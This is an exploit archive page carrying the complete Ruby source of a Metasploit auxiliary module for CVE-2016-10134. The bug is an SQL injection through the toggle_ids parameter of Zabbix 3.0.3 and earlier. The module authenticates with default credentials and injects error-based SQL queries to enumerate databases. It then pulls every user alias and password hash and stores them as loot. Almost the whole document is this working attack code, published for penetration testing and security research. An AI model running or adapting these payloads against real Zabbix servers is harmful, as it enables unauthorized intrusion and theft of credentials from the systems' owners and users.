exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Zabbix toggle_ids SQL Injection

Zabbix toggle_ids SQL Injection
Posted Aug 31, 2024
Authored by bperry, 1N3 | Site metasploit.com

This Metasploit module will exploit a SQL injection in Zabbix 3.0.3 and likely prior in order to save the current usernames and password hashes from the database to a JSON file.

tags | exploit, sql injection
advisories | CVE-2016-10134
SHA-256 | 2ebbd2d691dd7508785002385cab0f09585ac3584018b08791e074e76431981a

Zabbix toggle_ids SQL Injection

Change Mirror Download
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Report
include Msf::Exploit::Remote::HttpClient

def initialize(info = {})
super(update_info(info,
'Name' => 'Zabbix toggle_ids SQL Injection',
'Description' => %q{
This module will exploit a SQL injection in Zabbix 3.0.3 and
likely prior in order to save the current usernames and
password hashes from the database to a JSON file.
},
'References' =>
[
['CVE', '2016-10134'],
['URL', 'https://seclists.org/fulldisclosure/2016/Aug/60']
],
'Author' =>
[
'1n3@hushmail.com', #discovery
'bperry' #module
],
'License' => MSF_LICENSE,
'DisclosureDate' => '2016-08-11'
))

register_options(
[
OptBool.new('REQUIREAUTH', [true, 'Enforce authentication', false]),
OptString.new('USERNAME', [false, 'The username to authenticate with', 'Admin']),
OptString.new('PASSWORD', [false, 'The password to authenticate with', 'zabbix']),
OptString.new('TARGETURI', [true, 'The relative URI for Zabbix', '/zabbix'])
])
end

def check

sid, cookies = authenticate

left_marker = Rex::Text.rand_text_alpha(5)
right_marker = Rex::Text.rand_text_alpha(5)
flag = Rex::Text.rand_text_alpha(5)

query = "AND (SELECT 1256 FROM(SELECT COUNT(*),CONCAT(0x#{left_marker.unpack("H*")[0]}"
query << ",(SELECT MID((IFNULL(CAST(0x#{flag.unpack("H*")[0]} AS CHAR),0x20)),1,54)"
query << " FROM dual LIMIT 0,1),0x#{right_marker.unpack("H*")[0]},FLOOR(RAND(0)*2))x FROM"
query << ' INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)'

res = make_injected_request(query, sid, cookies)

unless res and res.body
return Msf::Exploit::CheckCode::Safe
end

match = /#{left_marker}(.*)#{right_marker}/.match(res.body)

unless match
fail_with(Failure::Unknown, 'Server did not respond in an expected way')
end

if match[1] == flag
return Msf::Exploit::CheckCode::Vulnerable
end

Msf::Exploit::CheckCode::Safe
end

def run
sid, cookies = authenticate

left_marker = Rex::Text.rand_text_alpha(5)
right_marker = Rex::Text.rand_text_alpha(5)

query = " AND (SELECT 5361 FROM(SELECT COUNT(*),CONCAT(0x#{left_marker.unpack("H*")[0]}"
query << ",(SELECT IFNULL(CAST(COUNT(schema_name) AS CHAR),0x20) FROM"
query << " INFORMATION_SCHEMA.SCHEMATA),0x#{right_marker.unpack("H*")[0]},FLOOR(RAND(0)*2))x"
query << " FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)"

res = make_injected_request(query, sid, cookies)

unless res and res.body
fail_with(Failure::Unknown, 'Server did not respond in an expected way')
end

match = /#{left_marker}(.*)#{right_marker}/.match(res.body)

unless match
fail_with(Failure::Unknown, 'Server did not respond in an expected way')
end

count = match[1].to_i

dbs = []
0.upto(count-1) do |cur|

get_dbs = " AND (SELECT 5184 FROM(SELECT COUNT(*),CONCAT(0x#{left_marker.unpack("H*")[0]}"
get_dbs << ",(SELECT MID((IFNULL(CAST(schema_name AS CHAR),0x20)),1,54)"
get_dbs << " FROM INFORMATION_SCHEMA.SCHEMATA LIMIT #{cur},1),0x#{right_marker.unpack("H*")[0]},"
get_dbs << "FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)"

res = make_injected_request(get_dbs, sid, cookies)

unless res and res.body
fail_with(Failure::Unknown, 'Server did not respond in an expected way')
end

match = /#{left_marker}(.*)#{right_marker}/.match(res.body)

unless match
fail_with(Failure::Unknown, 'Server did not respond in an expected way')
end

dbs << match[1]
end

dbs.delete("mysql")
dbs.delete("performance_schema")
dbs.delete("information_schema")

users = []
dbs.each do |db|
cols = ["alias", "passwd"]

user_count = " AND (SELECT 6262 FROM(SELECT COUNT(*),CONCAT(0x#{left_marker.unpack("H*")[0]}"
user_count << ",(SELECT IFNULL(CAST(COUNT(*) AS CHAR),0x20) FROM"
user_count << " #{db}.users),0x#{right_marker.unpack("H*")[0]},FLOOR(RAND(0)*2))x FROM"
user_count << " INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)"

res = make_injected_request(user_count, sid, cookies)

unless res and res.body
fail_with(Failure::Unknown, 'Server did not respond in an expected way')
end

match = /#{left_marker}(.*)#{right_marker}/.match(res.body)

unless match
fail_with(Failure::Unknown, 'Server did not respond in an expected way')
end

count = match[1].to_i

0.upto(count-1) do |cur|
user = {}
cols.each do |col|
get_col = " AND (SELECT 6334 FROM(SELECT COUNT(*),CONCAT(0x#{left_marker.unpack("H*")[0]}"
get_col << ",(SELECT MID((IFNULL(CAST(#{col} AS CHAR),0x20)),1,54)"
get_col << " FROM #{db}.users ORDER BY alias LIMIT #{cur},1),0x#{right_marker.unpack("H*")[0]}"
get_col << ',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)'

res = make_injected_request(get_col, sid, cookies)

unless res and res.body
fail_with(Failure::Unknown, 'Server did not respond in an expected way')
end

match = /#{left_marker}(.*)#{right_marker}/.match(res.body)

unless match
fail_with(Failure::Unknown, 'Server did not respond in an expected way')
end

user[col] = match[1]
end
users << user
end
end

loot = store_loot("zabbixusers.json","text/plain", rhost, users.to_json)

print_good('Users and password hashes stored at ' + loot)

end

def authenticate
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'index.php')
})

unless res and res.body
fail_with(Failure::Unknown, 'Server did not respond in an expected way')
end

cookies = res.get_cookies

match = /name="sid" value="(.*?)">/.match(res.body)

unless match
fail_with(Failure::Unknown, 'Server did not respond in an expected way')
end

sid = match[1]

if datastore['REQUIREAUTH']

res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'index.php'),
'method' => 'POST',
'vars_post' => {
'sid' => sid,
'form_refresh' => 1,
'name' => datastore['USERNAME'],
'password' => datastore['PASSWORD'],
'autologin' => 1,
'enter' => 'Sign in'
},
'cookie' => cookies
})

unless res
fail_with(Failure::Unknown, 'Server did not respond in an expected way')
end

if res.code == 302
cookies = res.get_cookies

res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'latest.php'),
'vars_get' => {
'ddreset' => '1'
},
'cookies' => cookies
})

unless res and res.body
fail_with(Failure::Unknown, 'Server did not respond in an expected way')
end

cookies = res.get_cookies
match = /name="sid" value="(.*?)">/.match(res.body)

unless match
fail_with(Failure::Unknown, 'Server did not respond in an expected way')
end

sid = match[1]
elsif
fail_with(Failure::Unknown, 'Server did not respond in an expected way')
end
end

return sid, cookies
end

def make_injected_request(sql, sid, cookies)
send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'latest.php'),
'method' => 'POST',
'vars_get' => {
'output' => 'ajax',
'sid' => sid
},
'vars_post' => {
'favobj' => 'toggle',
'toggle_ids[]' => '348 ' + sql,
'toggle_open_state' => 0
},
'cookie' => cookies
})
end
end
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    18 Files
  • 19
    Nov 19th
    7 Files
  • 20
    Nov 20th
    13 Files
  • 21
    Nov 21st
    6 Files
  • 22
    Nov 22nd
    48 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    60 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    44 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close